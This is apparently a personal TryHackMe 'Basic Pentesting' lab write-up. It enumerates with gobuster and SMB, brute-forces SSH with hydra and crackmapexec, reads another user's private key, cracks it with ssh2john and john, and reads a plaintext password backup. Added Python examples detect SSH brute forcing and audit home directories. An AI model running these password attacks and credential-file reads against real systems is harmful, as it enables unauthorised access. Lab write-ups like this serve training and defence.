Ex-iT's Notes

Basic Pentesting

tryhackme

ENUM

```bash
- gobuster dir -u http://10.10.108.101/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -x md,txt -t 30 -o gobust_root.txt
    /development
        - dev.txt -> struts / REST v2.5.12 (https://www.exploit-db.com/exploits/42627 ?)
        - j.txt -> J has a weak password
```

SMB

```plaintext
- smbclient -U '' //10.10.108.101/Anonymous
- get staff.txt
    users:
    Jan
    Kay
```

SSH

```plaintext
- crackmapexec ssh 10.10.108.101 -u jan -p /usr/share/wordlists/rockyou.txt
OR:
- hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.108.101 -t 4 ssh
[22][ssh] host: 10.10.108.101   login: jan   password: armando
```
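What the password-list run above looks like from the target's side: a burst of `Failed password` entries for one user from one source in sshd's auth.log, followed by an `Accepted password` once the list hits. The detector below is an added example (not part of these notes or of the room); the log lines are constructed, the source address 10.10.14.5 is made up, and the threshold and window are assumptions to tune per host.

```python
"""Spot an SSH password-guessing run in auth.log-style lines and flag the
login that succeeds right after it. Added example; sample log is constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime

LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse_ts(text: str, year: int = 2024) -> datetime:
    # syslog timestamps carry no year; assume one so entries can be compared
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(lines, threshold: int = 5, window_s: int = 60):
    """Return alerts as (kind, source, user, failure_count) tuples."""
    recent = defaultdict(deque)  # src -> failure timestamps still inside the window
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        t, user, src = parse_ts(m["ts"]), m["user"], m["src"]
        hist = recent[src]
        if m["result"] == "Failed":
            hist.append(t)
            while hist and (t - hist[0]).total_seconds() > window_s:
                hist.popleft()
            if len(hist) == threshold:  # fire once, when the burst crosses the line
                alerts.append(("bruteforce", src, user, len(hist)))
        elif hist:
            # a success on the heels of failures is the event worth paging on
            alerts.append(("success_after_failures", src, user, len(hist)))
            hist.clear()
    return alerts


# Constructed sample: one legitimate typo from 192.168.1.20, then a guessing
# run against "jan" from 10.10.14.5 (made-up address) that lands on the 7th try.
SAMPLE_LOG = [
    "Jun  3 10:14:50 target sshd[1190]: Failed password for kay from 192.168.1.20 port 40000 ssh2",
    "Jun  3 10:15:01 target sshd[1201]: Failed password for jan from 10.10.14.5 port 51234 ssh2",
    "Jun  3 10:15:02 target sshd[1202]: Failed password for jan from 10.10.14.5 port 51236 ssh2",
    "Jun  3 10:15:03 target sshd[1203]: Failed password for jan from 10.10.14.5 port 51238 ssh2",
    "Jun  3 10:15:04 target sshd[1204]: Failed password for jan from 10.10.14.5 port 51240 ssh2",
    "Jun  3 10:15:05 target sshd[1205]: Failed password for jan from 10.10.14.5 port 51242 ssh2",
    "Jun  3 10:15:06 target sshd[1206]: Failed password for jan from 10.10.14.5 port 51244 ssh2",
    "Jun  3 10:15:07 target sshd[1207]: Accepted password for jan from 10.10.14.5 port 51246 ssh2",
]

if __name__ == "__main__":
    for kind, src, user, count in detect_bruteforce(SAMPLE_LOG):
        print(f"{kind}: {user} from {src} after {count} failures")
```

The single failure from 192.168.1.20 never reaches the threshold, so it stays quiet; the run from 10.10.14.5 raises one `bruteforce` alert at the fifth failure and a `success_after_failures` alert on the accepted login. Counting per source rather than per user is deliberate: a spray across several accounts from one address still trips it.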

PRIVESC

```plaintext
- cat /home/kay/.ssh/id_rsa -> kay_id_rsa
- python /usr/share/john/ssh2john.py kay_id_rsa > kay_id_rsa.hash
- john --wordlist=/usr/share/wordlists/rockyou.txt kay_id_rsa.hash
    beeswax
```

SSH to get pass.bak

```plaintext
cat /home/kay/pass.bak -> heresareallystrongpasswordthatfollowsthepasswordpolicy$$
```
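The privesc chain depended on two things a home-directory audit would have caught: a private key that another user could read and that had a passphrase short enough for rockyou, and a plaintext password backup sitting next to it. The script below is an added example (not part of these notes or the room). It reads the cipher name out of the `openssh-key-v1` container to tell an unprotected key from a passphrase-protected one, checks key file modes, and flags password-looking backup files. The demo home it builds in a temp directory, the fake key blobs, and the file-naming rules are all constructed assumptions.

```python
"""Audit a home directory for unprotected SSH private keys and plaintext
credential backups. Added example; demo files are constructed in a temp dir."""
import base64
import stat
import struct
import tempfile
from pathlib import Path

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _ssh_string(data: bytes) -> bytes:
    """Length-prefixed string as used inside the openssh-key-v1 container."""
    return struct.pack(">I", len(data)) + data


def _read_ssh_string(buf: bytes, off: int):
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def key_cipher(key_text: str) -> str:
    """Cipher protecting a private key; 'none' means no passphrase at all."""
    lines = key_text.strip().splitlines()
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("not an openssh-key-v1 blob")
        cipher, _ = _read_ssh_string(blob, len(OPENSSH_MAGIC))  # first field is the cipher
        return cipher.decode()
    # legacy PEM keys mark encryption with a Proc-Type header instead
    if any(l.startswith("Proc-Type: 4,ENCRYPTED") for l in lines):
        return "legacy-pem"
    return "none"


def audit_home(root) -> list:
    """Return (relative_path, problem) findings for one home directory."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        mode = stat.S_IMODE(path.stat().st_mode)
        rel = str(path.relative_to(root))
        is_private_key = (path.parent.name == ".ssh"
                          and path.name.startswith("id_") and path.suffix != ".pub")
        if is_private_key:
            try:
                cipher = key_cipher(path.read_text(errors="replace"))
            except (ValueError, IndexError):
                cipher = "unknown"
            if cipher == "none":
                findings.append((rel, "private key has no passphrase"))
            if mode & 0o077:  # anything for group/other is too much for a key
                findings.append((rel, f"private key readable by others (mode {mode:04o})"))
        elif "pass" in path.name.lower() and path.suffix in {".bak", ".txt", ".old"}:
            findings.append((rel, "possible plaintext credential file"))
    return findings


def make_fake_openssh_key(cipher: str, kdf: str) -> str:
    """Constructed openssh-key-v1 header: enough for the cipher check, not a usable key."""
    blob = (OPENSSH_MAGIC + _ssh_string(cipher.encode()) + _ssh_string(kdf.encode())
            + _ssh_string(b"") + struct.pack(">I", 1))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


def build_demo_home() -> str:
    """Constructed layout mirroring the write-up: ~/.ssh/id_rsa and ~/pass.bak."""
    home = tempfile.mkdtemp(prefix="kay_")
    ssh = Path(home, ".ssh")
    ssh.mkdir(mode=0o700)
    bad_key = ssh / "id_rsa"
    bad_key.write_text(make_fake_openssh_key("none", "none"))
    bad_key.chmod(0o644)  # readable by every local user
    good_key = ssh / "id_ed25519"
    good_key.write_text(make_fake_openssh_key("aes256-ctr", "bcrypt"))
    good_key.chmod(0o600)
    Path(home, "pass.bak").write_text("placeholder-password\n")  # constructed
    return home


if __name__ == "__main__":
    for item, problem in audit_home(build_demo_home()):
        print(f"{item}: {problem}")
```

A real OpenSSH key encrypted with a passphrase reports `aes256-ctr` (with `bcrypt` as the KDF); `none` in that field is exactly what made `ssh2john` unnecessary for an unprotected key and what turns a readable `id_rsa` into a ready-made credential. Note the check only tells protected from unprotected; a weak passphrase, as in the write-up, still needs a wordlist policy rather than a file scan.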